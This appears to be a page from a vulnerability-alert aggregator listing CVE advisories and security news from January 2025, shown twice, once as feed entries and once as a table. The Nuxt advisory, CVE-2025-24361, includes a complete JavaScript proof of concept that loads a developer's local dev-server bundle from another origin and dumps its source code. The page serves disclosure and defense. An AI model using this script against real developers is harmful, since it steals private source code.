CyberAlerts

CVE-2025-24361

[@nuxt/rspack-builder] Opening a malicious website while running a Nuxt dev server could allow read-only access to code

Description: Summary Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site. Details Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code. PoC Create a nuxt project with webpack / rspack builder. Run npm run dev Open http://localhost:3000 Run the script below in a web site that has a different origin. You can see the source code output in the document and the devtools console. const script = document.createElement('script') script.src = 'http://localhost:3000/_nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxt_app) { const moduleList = window.webpackChunknuxt_app[page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...

CVSS: MEDIUM (5.3)

EPSS Score: 0.04%

Source: Github Advisory Database (NPM)

January 27th, 2025 (5 months ago)

Do We Really Need The OWASP NHI Top 10?

Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.  Non-human identity security represents an emerging

Source: TheHackerNews

January 27th, 2025 (5 months ago)

CDNs: Great for speeding up the internet, bad for location privacy

Source: TheRegister

January 27th, 2025 (5 months ago)

UnitedHealth Data Breach Tally Upped to 190 Million Americans

Description: UnitedHealth Group has disclosed that the February 2024 ransomware attack on its Change Healthcare subsidiary affected approximately 190 million individuals, nearly double its initial estimate of 100 million. The confirmation, provided to TechCrunch late Friday, makes this the largest medical data breach in U.S. history. In a statement, UnitedHealth spokesperson Tyler Mason acknowledged the staggering … The post UnitedHealth Data Breach Tally Upped to 190 Million Americans appeared first on CyberInsider.

Source: CyberInsider

January 27th, 2025 (5 months ago)

British Museum says ex-contractor 'shut down' IT systems, wreaked havoc

Source: TheRegister

January 27th, 2025 (5 months ago)

GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

Description: A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.

Source: TheHackerNews

January 27th, 2025 (5 months ago)

MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Description: Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"

Source: TheHackerNews

January 27th, 2025 (5 months ago)

EXIF Viewer Classic vulnerable to cross-site scripting

Description: EXIF Viewer Classic provided by Rodrigue (former Kakera) contains a cross-site scripting vulnerability.

Source: Japan Vulnerability Notes (JVN)

January 27th, 2025 (5 months ago)

CVE-2025-24858

Develocity (formerly Gradle Enterprise) before 2024.3.1 allows an attacker who has network access to a Develocity server to obtain the hashed...

Description: Develocity (formerly Gradle Enterprise) before 2024.3.1 allows an attacker who has network access to a Develocity server to obtain the hashed password of the system user. The hash algorithm used by Develocity was chosen according to best practices for password storage and provides some protection against brute-force attempts. The applicable severity of this vulnerability depends on whether a Develocity server is accessible by external or unauthorized users, and the complexity of the System User password.

CVSS: HIGH (8.3)

EPSS Score: 0.04%

Source: CVE

January 27th, 2025 (5 months ago)

CVE-2025-0722

needyamin image_gallery Cover Image gallery.php unrestricted upload

Description: A vulnerability classified as critical was found in needyamin image_gallery 1.0. This vulnerability affects unknown code of the file /admin/gallery.php of the component Cover Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. In needyamin image_gallery 1.0 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /admin/gallery.php der Komponente Cover Image Handler. Mit der Manipulation des Arguments image mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.

CVSS: MEDIUM (5.1)

EPSS Score: 0.07%

Source: CVE

January 27th, 2025 (5 months ago)

Threat and Vulnerability Intelligence Database

Example Searches:

CVE-2025-24361	[@nuxt/rspack-builder] Opening a malicious website while running a Nuxt dev server could allow read-only access to code Description: Summary Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site. Details Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code. PoC Create a nuxt project with webpack / rspack builder. Run npm run dev Open http://localhost:3000 Run the script below in a web site that has a different origin. You can see the source code output in the document and the devtools console. const script = document.createElement('script') script.src = 'http://localhost:3000/_nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxt_app) { const moduleList = window.webpackChunknuxt_app[page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t... CVSS: MEDIUM (5.3) EPSS Score: 0.04% Source: Github Advisory Database (NPM) January 27th, 2025 (5 months ago)
	Do We Really Need The OWASP NHI Top 10? Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.  Non-human identity security represents an emerging Source: TheHackerNews January 27th, 2025 (5 months ago)
	CDNs: Great for speeding up the internet, bad for location privacy Source: TheRegister January 27th, 2025 (5 months ago)
	UnitedHealth Data Breach Tally Upped to 190 Million Americans Description: UnitedHealth Group has disclosed that the February 2024 ransomware attack on its Change Healthcare subsidiary affected approximately 190 million individuals, nearly double its initial estimate of 100 million. The confirmation, provided to TechCrunch late Friday, makes this the largest medical data breach in U.S. history. In a statement, UnitedHealth spokesperson Tyler Mason acknowledged the staggering … The post UnitedHealth Data Breach Tally Upped to 190 Million Americans appeared first on CyberInsider. Source: CyberInsider January 27th, 2025 (5 months ago)
	British Museum says ex-contractor 'shut down' IT systems, wreaked havoc Source: TheRegister January 27th, 2025 (5 months ago)
	GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities Description: A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon. Source: TheHackerNews January 27th, 2025 (5 months ago)
	MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks Description: Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file," Source: TheHackerNews January 27th, 2025 (5 months ago)
	EXIF Viewer Classic vulnerable to cross-site scripting Description: EXIF Viewer Classic provided by Rodrigue (former Kakera) contains a cross-site scripting vulnerability. Source: Japan Vulnerability Notes (JVN) January 27th, 2025 (5 months ago)
CVE-2025-24858	Develocity (formerly Gradle Enterprise) before 2024.3.1 allows an attacker who has network access to a Develocity server to obtain the hashed... Description: Develocity (formerly Gradle Enterprise) before 2024.3.1 allows an attacker who has network access to a Develocity server to obtain the hashed password of the system user. The hash algorithm used by Develocity was chosen according to best practices for password storage and provides some protection against brute-force attempts. The applicable severity of this vulnerability depends on whether a Develocity server is accessible by external or unauthorized users, and the complexity of the System User password. CVSS: HIGH (8.3) EPSS Score: 0.04% Source: CVE January 27th, 2025 (5 months ago)
CVE-2025-0722	needyamin image_gallery Cover Image gallery.php unrestricted upload Description: A vulnerability classified as critical was found in needyamin image_gallery 1.0. This vulnerability affects unknown code of the file /admin/gallery.php of the component Cover Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. In needyamin image_gallery 1.0 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /admin/gallery.php der Komponente Cover Image Handler. Mit der Manipulation des Arguments image mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. CVSS: MEDIUM (5.1) EPSS Score: 0.07% Source: CVE January 27th, 2025 (5 months ago)